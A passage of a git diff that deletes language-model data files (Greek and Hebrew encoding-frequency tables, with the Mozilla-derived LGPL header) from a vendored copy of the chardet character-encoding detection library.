-0,2,3,2,2,3,3,3,3,3,3,3,3,0,3,3,3,3,0,2,3,3,0,3,3,3,3,2,3,3,3,0, -2,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,2,1,3,3,3,3,2,3,3,2,3,3,2,0, -0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,0,3,3,3,3,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,2,3,3,0, -2,0,1,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,2,3,0,0,0,0,3,3,0,3,1,3,3,3,0,3,3,0,3,3,3,3,0,0,0,0, -2,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,0,3,0,3,3,3,3,3,0,3,2,2,2,3,0,2,3,3,3,3,3,2,3,3,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,3,2,2,2,3,3,3,3,0,3,1,3,3,3,3,2,3,3,3,3,3,3,3,2,2,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,2,0,3,0,0,0,3,3,2,3,3,3,3,3,0,0,3,2,3,0,2,3,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,0,3,3,3,3,0,0,3,3,0,2,3,0,3,0,3,3,3,0,0,3,0,3,0,2,2,3,3,0,0, -0,0,1,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,2,0,3,2,3,3,3,3,0,3,3,3,3,3,0,3,3,2,3,2,3,3,2,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,2,3,2,3,3,3,3,3,3,0,2,3,2,3,2,2,2,3,2,3,3,2,3,0,2,2,2,3,0, -2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,0,0,0,3,3,3,2,3,3,0,0,3,0,3,0,0,0,3,2,0,3,0,3,0,0,2,0,2,0, -0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,0,3,3,3,3,3,3,0,3,3,0,3,0,0,0,3,3,0,3,3,3,0,0,1,2,3,0, -3,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,2,0,0,3,2,2,3,3,0,3,3,3,3,3,2,1,3,0,3,2,3,3,2,1,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,3,0,2,3,3,3,3,3,3,0,0,3,0,3,0,0,0,3,3,0,3,2,3,0,0,3,3,3,0, -3,0,0,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,0,3,3,3,3,3,3,0,0,3,0,3,0,0,0,3,2,0,3,2,3,0,0,3,2,3,0, -2,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,1,2,2,3,3,3,3,3,3,0,2,3,0,3,0,0,0,3,3,0,3,0,2,0,0,2,3,1,0, -2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,0,3,3,3,3,0,3,0,3,3,2,3,0,3,3,3,3,3,3,0,3,3,3,0,2,3,0,0,3,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,0,3,3,3,0,0,3,0,0,0,3,3,0,3,0,2,3,3,0,0,3,0,3,0,3,3,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,0,0,0,3,3,3,3,3,3,0,0,3,0,2,0,0,0,3,3,0,3,0,3,0,0,2,0,2,0, -0,0,0,0,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,3,0,3,0,2,0,3,2,0,3,2,3,2,3,0,0,3,2,3,2,3,3,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,0,0,2,3,3,3,3,3,0,0,0,3,0,2,1,0,0,3,2,2,2,0,3,0,0,2,2,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,0,3,3,3,2,0,3,0,3,0,3,3,0,2,1,2,3,3,0,0,3,0,3,0,3,3,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,3,3,3,0,3,3,3,3,3,3,0,2,3,0,3,0,0,0,2,1,0,2,2,3,0,0,2,2,2,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,0,0,2,3,3,3,2,3,0,0,1,3,0,2,0,0,0,0,3,0,1,0,2,0,0,1,1,1,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,1,0,3,0,0,0,3,2,0,3,2,3,3,3,0,0,3,0,3,2,2,2,1,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,0,3,3,3,0,0,3,0,0,0,0,2,0,2,3,3,2,2,2,2,3,0,2,0,2,2,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,2,0,0,0,0,0,0,2,3,0,2,0,2,3,2,0,0,3,0,3,0,3,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,3,2,3,3,2,2,3,0,2,0,3,0,0,0,2,0,0,0,0,1,2,0,2,0,2,0, -0,2,0,2,0,2,2,0,0,1,0,2,2,2,0,2,2,2,0,2,2,2,0,0,2,0,0,1,0,0,0,0, -0,2,0,3,3,2,0,0,0,0,0,0,1,3,0,2,0,2,2,2,0,0,2,0,3,0,0,2,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,0,2,3,2,0,2,2,0,2,0,2,2,0,2,0,2,2,2,0,0,0,0,0,0,2,3,0,0,0,2, -0,1,2,0,0,0,0,2,2,0,0,0,2,1,0,2,2,0,0,0,0,0,0,1,0,2,0,0,0,0,0,0, -0,0,2,1,0,2,3,2,2,3,2,3,2,0,0,3,3,3,0,0,3,2,0,0,0,1,1,0,2,0,2,2, -0,2,0,2,0,2,2,0,0,2,0,2,2,2,0,2,2,2,2,0,0,2,0,0,0,2,0,1,0,0,0,0, -0,3,0,3,3,2,2,0,3,0,0,0,2,2,0,2,2,2,1,2,0,0,1,2,2,0,0,3,0,0,0,2, -0,1,2,0,0,0,1,2,0,0,0,0,0,0,0,2,2,0,1,0,0,2,0,0,0,2,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,3,3,2,2,0,0,0,2,0,2,3,3,0,2,0,0,0,0,0,0,2,2,2,0,2,2,0,2,0,2, -0,2,2,0,0,2,2,2,2,1,0,0,2,2,0,2,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0, -0,2,0,3,2,3,0,0,0,3,0,0,2,2,0,2,0,2,2,2,0,0,2,0,0,0,0,0,0,0,0,2, -0,0,2,2,0,0,2,2,2,0,0,0,0,0,0,2,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,2,0,0,3,2,0,2,2,2,2,2,0,0,0,2,0,0,0,0,2,0,1,0,0,2,0,1,0,0,0, -0,2,2,2,0,2,2,0,1,2,0,2,2,2,0,2,2,2,2,1,2,2,0,0,2,0,0,0,0,0,0,0, -0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -0,2,0,2,0,2,2,0,0,0,0,1,2,1,0,0,2,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,3,2,3,0,0,2,0,0,0,2,2,0,2,0,0,0,1,0,0,2,0,2,0,2,2,0,0,0,0, -0,0,2,0,0,0,0,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0, -0,2,2,3,2,2,0,0,0,0,0,0,1,3,0,2,0,2,2,0,0,0,1,0,2,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,0,2,0,3,2,0,2,0,0,0,0,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -0,0,2,0,0,0,0,1,1,0,0,2,1,2,0,2,2,0,1,0,0,1,0,0,0,2,0,0,0,0,0,0, -0,3,0,2,2,2,0,0,2,0,0,0,2,0,0,0,2,3,0,2,0,0,0,0,0,0,2,2,0,0,0,2, -0,1,2,0,0,0,1,2,2,1,0,0,0,2,0,0,2,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,1,2,0,2,2,0,2,0,0,2,0,0,0,0,1,2,1,0,2,1,0,0,0,0,0,0,0,0,0,0, -0,0,2,0,0,0,3,1,2,2,0,2,0,0,0,0,2,0,0,0,2,0,0,3,0,0,0,0,2,2,2,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,1,0,2,0,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,2, -0,2,2,0,0,2,2,2,2,2,0,1,2,0,0,0,2,2,0,1,0,2,0,0,2,2,0,0,0,0,0,0, -0,0,0,0,1,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,0,0,0,0,2,0,2,0,0,0,0,2, -0,1,2,0,0,0,0,2,2,1,0,1,0,1,0,2,2,2,1,0,0,0,0,0,0,1,0,0,0,0,0,0, -0,2,0,1,2,0,0,0,0,0,0,0,0,0,0,2,0,0,2,2,0,0,0,0,1,0,0,0,0,0,0,2, -0,2,2,0,0,0,0,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,2,0,0,0, -0,2,2,2,2,0,0,0,3,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0,1, -0,0,2,0,0,0,0,1,2,0,0,0,0,0,0,2,2,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0, -0,2,0,2,2,2,0,0,2,0,0,0,0,0,0,0,2,2,2,0,0,0,2,0,0,0,0,0,0,0,0,2, -0,0,1,0,0,0,0,2,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0, -0,3,0,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,2, -0,0,2,0,0,0,0,2,2,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,0,2,2,1,0,0,0,0,0,0,2,0,0,2,0,2,2,2,0,0,0,0,0,0,2,0,0,0,0,2, -0,0,2,0,0,2,0,2,2,0,0,0,0,2,0,2,0,0,0,0,0,2,0,0,0,2,0,0,0,0,0,0, -0,0,3,0,0,0,2,2,0,2,2,0,0,0,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,2,0,0,0,0,0, -0,2,2,2,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1, -0,0,0,0,0,0,0,2,1,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,2,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -0,2,0,0,0,2,0,0,0,0,0,1,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,2,0,0,0, -0,2,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,2,0,2,0,0,0, -0,0,0,0,0,0,0,0,2,1,0,0,0,0,0,0,2,0,0,0,1,2,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -) - -Latin7GreekModel = { \ - 'charToOrderMap': Latin7_CharToOrderMap, - 'precedenceMatrix': GreekLangModel, - 'mTypicalPositiveRatio': 0.982851, - 'keepEnglishLetter': constants.False, - 'charsetName': "ISO-8859-7" -} - -Win1253GreekModel = { \ - 'charToOrderMap': win1253_CharToOrderMap, - 'precedenceMatrix': GreekLangModel, - 'mTypicalPositiveRatio': 0.982851, - 'keepEnglishLetter': constants.False, - 'charsetName': "windows-1253" -} diff --git a/chardet/chardet/langgreekmodel.pyc b/chardet/chardet/langgreekmodel.pyc deleted file mode 100644 index 0012470..0000000 Binary files a/chardet/chardet/langgreekmodel.pyc and /dev/null differ diff --git a/chardet/chardet/langhebrewmodel.py b/chardet/chardet/langhebrewmodel.py deleted file mode 100644 index de5415e..0000000 --- a/chardet/chardet/langhebrewmodel.py +++ /dev/null @@ -1,201 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Simon Montagu -# Portions created by the Initial Developer are Copyright (C) 2005 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# Shoshannah Forbes - original C code (?) -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants - -# 255: Control characters that usually does not exist in any text -# 254: Carriage/Return -# 253: symbol (punctuation) that does not belong to word -# 252: 0 - 9 - -# Windows-1255 language model -# Character Mapping Table: -win1255_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 69, 91, 79, 80, 92, 89, 97, 90, 68,111,112, 82, 73, 95, 85, # 40 - 78,121, 86, 71, 67,102,107, 84,114,103,115,253,253,253,253,253, # 50 -253, 50, 74, 60, 61, 42, 76, 70, 64, 53,105, 93, 56, 65, 54, 49, # 60 - 66,110, 51, 43, 44, 63, 81, 77, 98, 75,108,253,253,253,253,253, # 70 -124,202,203,204,205, 40, 58,206,207,208,209,210,211,212,213,214, -215, 83, 52, 47, 46, 72, 32, 94,216,113,217,109,218,219,220,221, - 34,116,222,118,100,223,224,117,119,104,125,225,226, 87, 99,227, -106,122,123,228, 55,229,230,101,231,232,120,233, 48, 39, 57,234, - 30, 59, 41, 88, 33, 37, 36, 31, 29, 35,235, 62, 28,236,126,237, -238, 38, 45,239,240,241,242,243,127,244,245,246,247,248,249,250, - 9, 8, 20, 16, 3, 2, 24, 14, 22, 1, 25, 15, 4, 11, 6, 23, - 12, 19, 13, 26, 18, 27, 21, 17, 7, 10, 5,251,252,128, 96,253, -) - -# Model Table: -# total sequences: 100% -# first 512 sequences: 98.4004% -# first 1024 sequences: 1.5981% -# rest sequences: 0.087% -# negative sequences: 0.0015% -HebrewLangModel = ( \ -0,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,3,2,1,2,0,1,0,0, -3,0,3,1,0,0,1,3,2,0,1,1,2,0,2,2,2,1,1,1,1,2,1,1,1,2,0,0,2,2,0,1, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2, -1,2,1,2,1,2,0,0,2,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2, -1,2,1,3,1,1,0,0,2,0,0,0,1,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,0,1,2,2,1,3, -1,2,1,1,2,2,0,0,2,2,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,1,0,1,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,2,2,2,2,3,2, -1,2,1,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,2,3,2,2,3,2,2,2,1,2,2,2,2, -1,2,1,1,2,2,0,1,2,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,0,2,2,2,2,2, -0,2,0,2,2,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,0,2,2,2, -0,2,1,2,2,2,0,0,2,1,0,0,0,0,1,0,1,0,0,0,0,0,0,2,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,2,1,2,3,2,2,2, -1,2,1,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,0, -3,3,3,3,3,3,3,3,3,2,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,1,0,2,0,2, -0,2,1,2,2,2,0,0,1,2,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,2,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,2,3,2,2,3,2,1,2,1,1,1, -0,1,1,1,1,1,3,0,1,0,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,1,1,0,0,1,0,0,1,0,0,0,0, -0,0,1,0,0,0,0,0,2,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2, -0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,2,3,3,3,2,1,2,3,3,2,3,3,3,3,2,3,2,1,2,0,2,1,2, -0,2,0,2,2,2,0,0,1,2,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0, -3,3,3,3,3,3,3,3,3,2,3,3,3,1,2,2,3,3,2,3,2,3,2,2,3,1,2,2,0,2,2,2, -0,2,1,2,2,2,0,0,1,2,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,2,3,3,2,2,2,3,3,3,3,1,3,2,2,2, -0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,3,3,2,3,2,2,2,1,2,2,0,2,2,2,2, -0,2,0,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,1,3,2,3,3,2,3,3,2,2,1,2,2,2,2,2,2, -0,2,1,2,1,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,2,3,2,3,3,2,3,3,3,3,2,3,2,3,3,3,3,3,2,2,2,2,2,2,2,1, -0,2,0,1,2,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,2,1,2,3,3,3,3,3,3,3,2,3,2,3,2,1,2,3,0,2,1,2,2, -0,2,1,1,2,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,2,0, -3,3,3,3,3,3,3,3,3,2,3,3,3,3,2,1,3,1,2,2,2,1,2,3,3,1,2,1,2,2,2,2, -0,1,1,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,0,2,3,3,3,1,3,3,3,1,2,2,2,2,1,1,2,2,2,2,2,2, -0,2,0,1,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,2,3,3,3,2,2,3,3,3,2,1,2,3,2,3,2,2,2,2,1,2,1,1,1,2,2, -0,2,1,1,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,1,0,0,0,0,0, -1,0,1,0,0,0,0,0,2,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,2,3,3,2,3,1,2,2,2,2,3,2,3,1,1,2,2,1,2,2,1,1,0,2,2,2,2, -0,1,0,1,2,2,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0, -3,0,0,1,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,2,0, -0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,1,0,1,0,1,1,0,1,1,0,0,0,1,1,0,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,0,0,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -3,2,2,1,2,2,2,2,2,2,2,1,2,2,1,2,2,1,1,1,1,1,1,1,1,2,1,1,0,3,3,3, -0,3,0,2,2,2,2,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -2,2,2,3,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,1,2,2,2,1,1,1,2,0,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2,2,2,2,0,2,2,0,0,0,0,0,0, -0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,1,0,2,1,0, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0, -0,3,1,1,2,2,2,2,2,1,2,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,0,1,1,1,1,0, -0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,2,1,1,1,1,2,1,1,2,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,0,0, -0,0,2,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,1,0,0, -2,1,1,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,1,2,1,2,1,1,1,1,0,0,0,0, -0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,2,1,2,2,2,2,2,2,2,2,2,2,1,2,1,2,1,1,2,1,1,1,2,1,2,1,2,0,1,0,1, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,1,2,2,2,1,2,2,2,2,2,2,2,2,1,2,1,1,1,1,1,1,2,1,2,1,1,0,1,0,1, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,1,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2, -0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,1,1,1,1,1,1,1,0,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0, 